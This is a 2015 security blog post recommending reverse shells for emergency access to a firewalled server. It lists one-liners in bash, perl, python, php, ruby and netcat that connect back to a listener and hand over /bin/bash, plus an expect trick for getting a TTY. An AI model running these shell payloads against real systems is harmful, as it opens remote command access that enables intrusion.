18 Jun 2015 08:44 | security
Don't you just hate it when an emergency happens with an important server and
access from your location is firewalled? Luckily if there's someone else local
to the machine who can execute commands for you, getting onto it is fairly
trivial.
First make sure that the machine you're on can accept connections from the
internet on a TCP port (any). Typically you'll need to map this through on
whatever firewall/router you've got on the local network.
Let's say your ip address is 127.127.127.127 and you've mapped tcp port 13131.
Simply listen on the port with netcat:
$ nc -l 13131
then have someone on the remote machine run any of these:
bash:
bash -i >& /dev/tcp/127.127.127.127/13131 0>&1
perl:
perl -e 'use
Socket;$i="127.127.127.127";$p=13131;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash
-i");};'
python:
python -c 'import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.127.127.127",13131));os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
php:
php -r '$sock=fsockopen("127.127.127.127",13131);exec("/bin/bash -i <&3 >&3
2>&3");'
ruby:
ruby -rsocket -e'f=TCPSocket.open("127.127.127.127",13131).to_i;exec
sprintf("/bin/bash -i <&%d >&%d 2>&%d",f,f,f)'
netcat:
nc -e /bin/bash 127.127.127.127 13131
and hey presto, your netcat listener is now connected to the shell. Of course
the connection isn't encrypted, so you'll want to be careful what you type over
it, but for emergency use it's quite handy. The advantage over the obvious
choice for this (ssh) is that you don't have to give the person who's at the
server end any credentials to log into your machine with in order to set up the
connection.
source: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
<strong>Update</strong>
One limitation of this is that you won't have a tty, which makes many things
impossile or difficult.
However if expect is installed you can get one by dropping this into a file and
running it:
#!/usr/bin/expect
# Spawn a shell, then allow the user to interact with it. The new shell will
# have a good enough TTY to run tools like ssh, su and login
spawn bash interact
then you have a full tty and can run sudo, su, screen etc :)
